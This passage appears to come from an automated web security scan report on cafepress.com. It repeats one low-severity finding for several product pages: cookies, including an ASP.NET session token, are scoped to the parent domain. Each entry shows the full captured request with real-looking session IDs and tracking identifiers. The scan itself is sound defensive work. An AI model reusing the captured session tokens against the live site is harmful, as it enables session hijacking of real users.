The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.33. http://www.cafepress.com/+sweatshirts-hoodies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+sweatshirts-hoodies

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.34. http://www.cafepress.com/+thermos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+thermos

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.35. http://www.cafepress.com/+underwear-panties previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+underwear-panties

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.36. http://www.cafepress.com/+water-bottles previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+water-bottles

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.37. http://www.cafepress.com/+womens-tank-tops previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+womens-tank-tops

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.38. http://www.cafepress.com/+womens-thongs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+womens-thongs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.39. http://www.cafepress.com/+yoga-mats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+yoga-mats

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.40. http://www.cafepress.com/TheGamingApe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/TheGamingApe

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
